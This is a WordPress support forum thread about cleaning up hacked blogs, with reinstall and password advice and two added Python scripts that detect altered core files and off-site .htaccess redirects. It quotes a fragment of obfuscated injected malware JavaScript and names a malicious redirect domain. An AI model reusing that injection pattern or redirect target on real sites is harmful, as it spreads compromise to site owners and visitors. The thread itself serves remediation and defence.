My blog is hacked and with malware! (23 posts)

  1. sinankurt
    Member
    Posted 2 years ago #

    Hello,

    I am from Germany, so sorry for my bad English.

    I actually saw on Google Chrome that my WordPress blog (www.quartel.de) includes malware. I did everything to remove that malware, but I actually don't know how.

    I downloaded my whole WordPress content with FileZilla, but I don't know how and where to search for the viruses. Google says that it should look like this:

    <script>var s=new String();try{document.getElementById('t3v2562v3r3').innerHTML}catch(q){r=1;c=String;}if(r&&document.createTextNode)o=2;e=window.eval;m=Array(4.5*o,18/o,52.5*o,204/o,16*o,

    How can I find this malware?

  2. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    Don't try to search; replace all the wp files, including plugins and theme files, with a fresh copy. Also change your wp password, and also change it if used anywhere else (this is often how they get your wp password, as it's the same as your hacked commercial account using the same email address and password). You should take this time to update to the latest versions of each plugin/theme and wp. If your database was compromised (the offending code may be in a table in the database), change the password (and make sure you update wp-config). If you cannot log in to WordPress as admin, rename the index.php file to index.html and try then...a new index.php file is created...this index.php file is in the root of your theme. The likely location for the offending code is in the wp_options table...manually editing the database is not for a novice. Good luck!

  3. sinankurt
    Member
    Posted 2 years ago #

    Thanks for the fast answer.

    I can normally log in to my blog as admin and use it, too. But I don't know what you mean with replace? I mean, then are all my things in the past deleted, not? That would be really bad.

  4. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    I mean to use your ftp client to manually replace all wp files.

    WP settings are kept in the database, if your db is not what was hacked, you will be OK. You may lose any customizations done directly to wp files, like custom css, etc...these can be simply re-edited using the files you downloaded as a ref...if you made the changes, you should know what they are.

  5. rballin
    Member
    Posted 2 years ago #

    My site got hacked as well. Should I uninstall WP and then re-install it?

  6. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    Yes, that's to make sure no files are infected with bad code. Please note to make sure to keep a copy of everything including a full backup of your database. Some say you can leave the wp-contents folder as is, but I am not convinced this folder cannot contain a hacked file as it is just as vulnerable as any one folder in wp to be hacked. I would do this manually via ftp as the admin scripts could be corrupt. And change those passwords you use.

  7. rballin
    Member
    Posted 2 years ago #

    I have a small issue...my hard drive crashed a few months ago and I didn't save the theme I downloaded and paid for...is there any way I can save that before I delete everything?

  8. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    You can connect to your site with FTP and download the theme files - actually, to properly back it up you should do this often, then back that up!

  9. sinankurt
    Member
    Posted 2 years ago #

    Yes, I downloaded all files from my blog for now. But what to do in the next step? Please help me, I don't want that my blog gets blacklisted.

  10. rballin
    Member
    Posted 2 years ago #

    Ok so I deleted all the WP files then I uploaded a backup that I did this afternoon and my site looks as bare as the day I started it...what am I doing wrong??

  11. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    Before proceeding with a manual install/updates, it is important to review and understand all the related topics here:

    http://codex.wordpress.org/Installing_WordPress#Detailed_Instructions

    First you need to take inventory, then download what you need. Review the link above and make sure you fully understand it, then:

    Write down a list of the installed plugins and the theme. Each as they appear in the appropriate wp admin panel section will have links to the author and WordPress page for them. After confirming compatibility with the current WordPress version, download the latest version, saving each to a common location. Once you have gathered the files you need, they need to be extracted. Once extracted, each will have a default folder name such as mythemev1.x; it is the whole folder inside that you need.

    Download WP 3.2.1 (make sure your host supports this version; it requires certain versions of supporting programs/modules etc., like php). Extract files.

    The file sample-wp-config.php needs to be renamed to just wp-config and it needs to have the same data as your current wp-config.php (you can just copy the wp-config.php file but make sure it's correct and does not have errant code). This step is very important to do right.

    Verify that your .htaccess file or web.config file (IIS7) is correct.

    Create a new folder called BlogNewFiles (or whatever). Move the wp files to that folder. Navigate to the wp-contents folder, then plugins and then theme folders and put the plugins and theme folders you extracted into them accordingly.

    Log back into site as admin and deactivate your theme and all plugins. This is very important to have the next steps work right.

    Next, open Notepad (ASCII text editor - NOT Word or other rich text editor) and paste this in and save the file as ".maintenance" (dot first, no extension, or quotes):

    <?php $upgrading = time(); ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <title>Maintenance</title>
    <style type="text/css">
    .style1 {
    	font-size: x-large;
    }
    .style2 {
    	font-size: large;
    }
    </style>
    </head>
    <body style="background-color: #008080">
    <h1>Briefly unavailable for scheduled maintenance. Check back soon.</h1>
    <h2>This site is currently in Maintenance Mode. What, you say? Occasionally,
    Wordpress needs to have core files updated, plug-ins updated, and then a short period
    for testing is required. Look back soon.</h2>
    <h2>Thanks!</h2>
    </body>
    </html>
    <?php die(); ?>

    (Above is an example and can be styled as you choose)

    Using cPanel or phpmyadmin (see your web host documentation on this), and make sure you are quite clear on the instructions to backup your database, then do so.

    Back to FTP now, (make really sure you have ALL your files downloaded, both old and new), then rename the folders:

    wp-admin
    wp-contents and
    wp-includes

    to

    xxx-wp-admin
    xxx-wp-contents and
    xxx-wp-includes

    (this saves the files on the servers...if your upgrade fails, remove the new files and rename those back)

    Then upload your new files and afterwards remove the .maintenance file (or rename).

    Log into site, activate your theme, activate your plugins, and review the site for style and functionality.

    If it was files that were hacked, this will fix it; if not, then work needs to be done on the database (which may again in turn corrupt your files, so this part may have to be redone too).

    Please reply with any questions and especially if this helped.
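
    Added example, not part of the original post: before swapping the folders, the FTP copy can be compared against the freshly extracted WordPress of the same version to list which core files were changed and which files exist only on the site. The function names and the sample trees below are constructed for illustration.

```python
import hashlib
import os
import tempfile

def sha256_tree(root):
    """Map each file's path relative to root to the SHA-256 of its contents."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):   # os.walk also visits dotfiles
        for name in files:
            full = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[os.path.relpath(full, root).replace(os.sep, "/")] = h.hexdigest()
    return digests

def compare_to_clean(site_copy, clean_copy, ignore=("wp-config.php",)):
    """Return (modified, added): files whose content differs from the clean
    copy, and files that exist only in the site copy (minus expected ones)."""
    site, clean = sha256_tree(site_copy), sha256_tree(clean_copy)
    modified = sorted(p for p in site if p in clean and site[p] != clean[p])
    added = sorted(p for p in site if p not in clean and p not in ignore)
    return modified, added

def _write(root, rel, text):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)

def demo():
    # Constructed sample trees standing in for the fresh download and the FTP copy.
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as site:
        for root in (clean, site):
            _write(root, "index.php", "<?php require 'wp-blog-header.php';\n")
            _write(root, "wp-includes/version.php", "<?php $wp_version = 'x';\n")
        _write(site, "index.php",
               "<?php require 'wp-blog-header.php';\n<script>/* injected */</script>\n")
        _write(site, "wp-includes/extra.php", "<?php /* not in the release */\n")
        _write(site, "wp-config.php", "<?php /* site settings */\n")
        return compare_to_clean(site, clean)

if __name__ == "__main__":
    modified, added = demo()
    print("modified:", modified)
    print("added:", added)
```

    Themes, plugins and uploads that are not in the clean tree will be listed as added; that list is a starting point for review, not a verdict.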

  12. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    @rballin, did you upload the files in the root also, following the instructions above?

  13. rballin
    Member
    Posted 2 years ago #

    I honestly don't understand any of this and I feel so screwed because I am now worse off than I was before.

  14. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    @rballin,

    Contact your webhost and see if they have any 'snapshots' of your files and database that precludes the problem. If not, you may need to hire someone.

  15. sinankurt
    Member
    Posted 2 years ago #

    I don't understand, too. I want to hire someone from sucuri, but I don't have a credit card. I am so demoralized, I don't know what to do now. I think my blog gets blacklisted, and do one....

    I would give somebody from here my wp password and my FTP password if he/she could fix that problem. Please, I am in a so big problem :(

  16. rballin
    Member
    Posted 2 years ago #

    @sinankurt I ended up calling my web host and had them reinstall my site from a few days before I got hacked. They were able to locate the malware for me and deleted everything. I had Google re-index it and everything is fine now. I would suggest doing that if you can't afford to pay someone to help you.

  17. sinankurt
    Member
    Posted 2 years ago #

    @rballin Ok, what should I ask my hoster to do now?

  18. rballin
    Member
    Posted 2 years ago #

    I explained that I was hacked. I told him that I tried to delete all the wordpress files, but wasn't sure how to reinstall them. Ask if they have a back up from a few days before you were hacked that they can install for you. Ask if they can take a look and see if there is anything there. My malware was in the Frontpage Extension, so have them check there as well as the code for the different pages. They should be able to delete it and put everything back to normal.

  19. ericgriffin
    Member
    Posted 2 years ago #

    Here is a simple step by step that I ran across that may help.

    http://actonweb.us/2011/01/how-to-clean-a-hacked-wordpress-site/

  20. Daniel Cid
    Member
    Posted 2 years ago #

    Also, note that this type of malware is related to stolen FTP passwords. We are seeing it on many sites and it comes through desktop viruses that steal passwords...

    We did a blog post explaining about it a while ago:
    http://blog.sucuri.net/2010/06/web-site-security-it-starts-with-your-desktop.html

    *The malware infection is different, but the method is the same.

    thanks,

  21. cmcenearney
    Member
    Posted 2 years ago #

    My site was recently hacked with users being redirected to

    http://sweepstakesandcontestsinfo.com/nl.php?nnn=555

    The hackers injected all kinds of crap into my site - adding scripts to .html files and .php files and creating new .php files. MOST IMPORTANTLY: they added redirect to the .htaccess files as described here:

    http://blog.sucuri.net/2011/11/htaccess-redirection-to-sweepstakesandcontestsinfo-dot-com.html

    I deleted them and everything is ok again, for now. I still have to figure out how it happened. NOTE: .htaccess is normally "invisible", so if you're not accessing from the command line you might need to adjust settings in your ftp client. Useful info here (even if not hosted by dreamhost):
    http://wiki.dreamhost.com/Htaccess#Finding_.htaccess_Files
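
    Added example, not part of the original post: a check that walks a downloaded copy of the site, opens every .htaccess (hidden files included) and reports redirect directives that point to a host other than the site's own. The sample rules and host names are constructed; they are not the rules from the infection described above.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# Apache directives that can send a visitor to an absolute URL.
TARGET_RE = re.compile(
    r"^\s*(RewriteRule|RedirectMatch|Redirect|ErrorDocument)\b.*?(https?://[^\s\"'\]]+)",
    re.IGNORECASE,
)

def find_offsite_redirects(root, own_hosts):
    """Return (relative path, line number, directive, host) for every
    redirect in a .htaccess under root whose target host is not ours."""
    own = {h.lower() for h in own_hosts}
    findings = []
    for dirpath, _dirs, files in os.walk(root):   # os.walk does not skip dotfiles
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="replace") as fh:
            for no, line in enumerate(fh, 1):
                if line.lstrip().startswith("#"):  # commented-out rule
                    continue
                m = TARGET_RE.match(line)
                if not m:
                    continue
                host = (urlparse(m.group(2)).hostname or "").lower()
                if host and host not in own:
                    findings.append((os.path.relpath(path, root), no, m.group(1), host))
    return findings

def demo():
    # Constructed sample: a normal WordPress .htaccess and one with an added redirect.
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content"))
        with open(os.path.join(root, ".htaccess"), "w") as fh:
            fh.write("RewriteEngine On\nRewriteRule . /index.php [L]\n")
        with open(os.path.join(root, "wp-content", ".htaccess"), "w") as fh:
            fh.write("RewriteEngine On\n"
                     "RewriteRule ^(.*)$ http://redirect.example.invalid/nl.php [R=301,L]\n")
        return find_offsite_redirects(root, {"www.example.org"})

if __name__ == "__main__":
    for hit in demo():
        print(hit)
```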

  22. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    cmcenearney,

    You will get more attention to your issue if you create a new post.

  23. mombley
    Member
    Posted 2 years ago #

    Hi!

    I see this is an old issue, but I have a question - if my db (of wp site) was hacked, can I do anything at all? This is just an "in case" question, because as I see it, I can't - all of my rights were shut down, so I can't even create a new db, even more, I can't log in to phpMyAdmin ...

    Thanks!

Topic Closed

This topic has been closed to new replies.
